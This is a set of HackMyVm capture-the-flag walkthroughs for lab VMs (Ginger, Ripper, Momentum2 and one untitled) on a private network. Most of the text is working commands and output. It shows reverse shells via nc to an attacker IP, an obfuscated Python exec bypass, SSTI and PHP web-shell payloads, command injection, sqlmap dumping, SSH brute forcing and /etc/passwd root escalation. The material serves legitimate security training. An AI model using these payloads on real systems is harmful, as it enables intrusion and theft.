 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /register             (Status: 301) [Size: 239] [--> http://192.168.56.100/register/]
 /index.html           (Status: 200) [Size: 4065]                                      
 /assets               (Status: 301) [Size: 237] [--> http://192.168.56.100/assets/]  
 /404.html             (Status: 200) [Size: 3305]                                      
 /robots.txt           (Status: 200) [Size: 83]

Check robots.txt

 ~ cat robots.txt    
 User-agent: *
 Disallow: /register
 Disallow: /login
 Disallow: /zbir7mn240soxhicso2z

Visit /zbir7mn240soxhicso2z, get username and password.

 Username: steve
 Password: bvbkukHAeVxtjjVH

Login, get an python IDE, with some string bypass. Use exec function to get reverse shell.

 strimp='imp'+'ort'+' o'+'s;'
 strcmd='o'+'s.system("nc 192.168.56.150 1234 -e /bin/bash")'
 exec(strimp)
 exec(strcmd)

Get reverse shell.

 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:51044.
 id
 uid=33(http) gid=33(http) groups=33(http)

In home folder of user py, get typing.cc.

 [http@archlinux py]$ ls -la
 ls -la
 total 56
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 .
 drwxr-xr-x 3 root root  4096 Apr  7 18:43 ..
 -rw------- 1 py   py      21 Dec 20 18:44 .bash_logout
 -rw------- 1 py   py      57 Dec 20 18:44 .bash_profile
 -rw------- 1 py   py     141 Dec 20 18:44 .bashrc
 -r-------- 1 py   py      11 Apr  9 12:04 password.txt
 drwx------ 2 py   py    4096 Apr  9 19:31 secret_stuff
 -r-sr-xr-x 1 py   py   19216 Apr  9 12:15 typing
 -r--r--r-- 1 py   py     689 Apr  9 12:15 typing.cc
 -r-------- 1 py   py      34 Apr  9 12:32 user.txt

Check source code of typing.cc. Get password of py.

 [http@archlinux py]$ ./typing
 ./typing
 Let's play a game! If you can type the sentence below, then I'll tell you my password.

 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 54ezhCGaJV

Ssh login as user py, in /home/py/secret_stuff folder, found backup.cc.

[py@archlinux ~]$ cd secret_stuff/
 [py@archlinux secret_stuff]$ ls -la
 total 40
 drwx------ 2 py   py    4096 Apr  9 19:31 .
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 ..
 -rwsr-xr-x 1 root root 26128 Apr  9 19:30 backup
 -rw-r--r-- 1 root root   586 Apr  9 19:30 backup.cc
 [py@archlinux secret_stuff]$

Check source code of backup.cc.

```
[py@archlinux secret_stuff]$ cat backup.cc

include <iostream>

include <string>

include <fstream>

int main(){
std::cout<<"Enter a line of text to back up: ";
std::string line;
std::getline(std::cin,line);
std::string path;
std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
std::getline(std::cin,path);

 if(!path.starts_with("/srv/backups/")){
     std::cout<<"The file must be inside the /srv/backups directory!\n";
 }
 else{
     std::ofstream backup_file(path,std::ios_base::app);
     backup_file<<line<<'\n';
 }
 return 0;

}

That means we can write new user with root privilege into /etc/passwd.

[py@archlinux secret_stuff]$ ./backup
Enter a line of text to back up: root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd
[py@archlinux secret_stuff]$ su root2
Password:
[root@archlinux secret_stuff]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux archlinux 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux

HackMyVm Ginger Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ginger

Find IP of VM.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                                                         ...
 192.168.56.100  08:00:27:45:72:fc       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
 /latest.zip           (Status: 200) [Size: 16866701]

Scan vulnerability of wordpress.

 ~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
 ...
 [+] cp-multi-view-calendar
  | Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
  | Last Updated: 2021-03-08T13:47:00.000Z
  | Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
  | [!] The version is out of date, the latest version is 1.3.99
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
  |
  | [!] 2 vulnerabilities identified:
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
  |     Fixed in: 1.1.5
  |     References:
  |      - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
  |      - https://www.exploit-db.com/exploits/36243/
  |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
  |     Fixed in: 1.1.8
  |     References:
  |      - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
  |      - https://www.exploit-db.com/exploits/37560/
  |
  | Version: 1.0.2 (50% confidence)
  | Found By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt

Seach the exploit in exploitdb.

~ searchsploit CP Multi View Event Calendar                                                       fish-0 | 0 [14:21:49]
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path                           ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection                   | php/webapps/35073.txt          
 WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection                  | php/webapps/37560.txt          
 ------------------------------------------------------------------------------------- ---------------------------------

Check 37560.txt, find the sql injection point, and use sqlmap to dump database.

 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5 --dbs --batch
 ...
 available databases [2]:
 [*] information_schema
 [*] wordpress_db
 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5  -D wordpress_db -T wp_users --dump
 ...
 Table: wp_users
 [1 entry]
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | 1  | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Crack the password hash with john the ripper.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 ~ john --show hash.txt            
 ?:sanitarium

Login wordpress with webmaster:sanitarium, in plugin editor, modify akismet.php, insert shell code.

image-20210609142750078.png

Visit the shell code and get reverse shell.

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

~ nc -nvlp 1234 ...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

 Found 3 users in /home.

www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster

 Found hint of sabrina.

www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory

Get the password through dmesg.

www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch

Log in ssh as sabrina, check sudo -l.

sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *

Check app.py, it's http server with SSTI on port 5000.

 ```
sabrina@ginger:~$ cat /opt/app.py

 from flask import Flask, request, render_template_string,render_template

 app = Flask(__name__)
 @app.route('/')
 def hello_ssti():
     person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
     if request.args.get('name'):
         person['name'] = request.args.get('name')
     template = '''<h2>Hello %s!</h2>''' % person['name']
     return render_template_string(template,person=person)
 def get_user_file(f_name):
     with open(f_name) as f:
         return f.readlines()
 app.jinja_env.globals['get_user_file'] = get_user_file

 if __name__ == "__main__":
     app.run(debug=True)

Start the server as webmaster.

sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
  * Serving Flask app "app" (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: on
  * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
  * Restarting with stat
  * Debugger is active!
  * Debugger PIN: 260-511-262

In another terminal, use ssh to port forward port 5000.

 ~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100

Visit the server with SSTI shell code.

```
127.0.0.1:5000/?name={{request.application.globals.builtins.import(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}

At the same time, use nc to listen to specific port, and get reverse shell as webmaster.

~ nc -nlvp 1234 fish-0 | 0 [14:34:52]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload id_rsa.pub to /home/webmaster/.ssh, change name to authorized_keys and chmod 600.

 ```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
 cd /home/webmaster
 webmaster@ginger:~$ mkdir .ssh
 mkdir .ssh
 webmaster@ginger:~$ cd .ssh
 cd .ssh
 webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 ...
 Saving to: ‘authorized_keys’
 authorized_keys     100%[===================>]     565  --.-KB/s    in 0s    
 webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
 chmod 600 authorized_keys

Now we can login ssh as webmaster

~ ssh webmaster@192.168.56.100  
 ...
 webmaster@ginger:~$ id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload pspy64 to VM and check it.

```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh

UID 1002 is user caroline, and the /home/backup folder is writable to webmaster.

drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup

Write bash code into /home/caroine/backup/backup.sh.

 ```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
 webmaster@ginger:/home/caroline$ rm backup/backup.sh          
 rm: remove write-protected regular file 'backup/backup.sh'? yes
 webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/    

Then we get reverse shell as caroline. Again, upload id_rsa.pub and get ssh access. Check sudo -l.

caroline@ginger:~$ sudo -l
 Matching Defaults entries for caroline on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User caroline may run the following commands on ginger:
     (ALL : ALL) NOPASSWD: /srv/code

Disassemble code, it just calls chmod to make passwd writable in 5 seconds.

```
int __cdecl main(int argc, const char argv, const char envp)
{
system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
return 0;
}

In 5 seconds, we write a new root user with password hash into file /etc/passwd.

caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#

HackMyVm Ripper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. Old ssh connection files may mean id_rsa.bak.

```
cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.

Take care the screen of VM told us the user name jack.

image-20210603115519124.png

Download id_rsa.bak, try to connect ssh, it's encrypted.

wget http://192.168.56.100/id_rsa.bak
2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]

ssh jack@192.168.56.100 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':

Use following code to brute force password.

cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C “jack@192.168.56.100” -P $pass -f id_rsa.bak &>/dev/null; then echo $pass; break; fi; done
bananas

Login as jack. After some enum, found nothing useful.

Download linpeas from github. Upload to VM.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

Run linpeas.sh, get a strange string.

[+] Hashes inside passwd file? ........... No
[+] Writable passwd file? ................ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
[+] Can I write in network-scripts? ...... No
[+] Can I read root folder? .............. No

It's the password of another user helder.

Download pspy64 from github(https://github.com/DominicBreuker/pspy), upload to VM, check system process.

2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1206 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi

The bash code means, if /root/.local/helder.txt is equal to /home/helder/passwd.txt, then we can send a string (like XXX) to port 10000, and system will set SUID bit of /usr/bin/XXX.

So we make a symbolic link, and send port 10000 string "bash". After a minute, /usr/bin/bash has been set SUID.

helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
helder@ripper:~$echo bash |nc -nlvp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
helder@ripper:~$ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash

Get root finally.

 ```
helder@ripper:~$/usr/bin/bash -p
 helder@ripper:~$id
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)

HackMyVm Momentum2 Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                      sudo-0 | 0 [15:05:51]
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================                  
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. We need to set some parameter to upload php file.

 cat ajax.php.bak  
     //The boss told me to add one more Upper Case letter at the end of the cookie
    if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
        //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
    }
    else{
         $valid_ext = array("txt");
    }
    // Remember success upload returns 1 ⏎    

Generate dic file of cookies.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with shell code in it.

 cat cmd.php                                                                                                                                                                                   fish-0 | 0 [21:02:13]
 <?php
 system($_GET["cmd"])
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with burpsuite.

[image-20210531210127178.png]

Send the request to Repeater, add cookie "admin=xxx", which we will bruteforce later, and add parameter "secure=val1d". Take care, it's not valid. If we click send now, response code will be 0, which means failed.

[image-20210531212540903.png]

Then send it to intruder, add §§ sign to admin=§xxxxx§.

[image-20210531213130392.png]

Set payload as cookie.txt we just generated.

image-20210531213158667 [image-20210531213158667.png]

Click start attack. Then we get the right cookie with response code 1.

[image-20210531213313743.png]

And cmd.php has been uploaded to /owls.

[image-20210531213353093.png]

Check if cmd.php works OK.

 ~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 -------------------------------------------------------------------------------------------------------
 nc -nlvp 1234                                                                    fish-0 | 130 [15:44:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, found password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

Asterisk mark (*) means any character, we generate a dic.

```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt

Bruteforce ssh with user name athena and this dic.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f fish-0 | 0 [15:25:54]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*

Ssh login as athena, check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py

Run the py file, when asked for input seed, input shell code.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;

Listen to the port just input at another terminal, and get root shell.

nc -nvlp 1234 man-0 | 0 [15:32:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)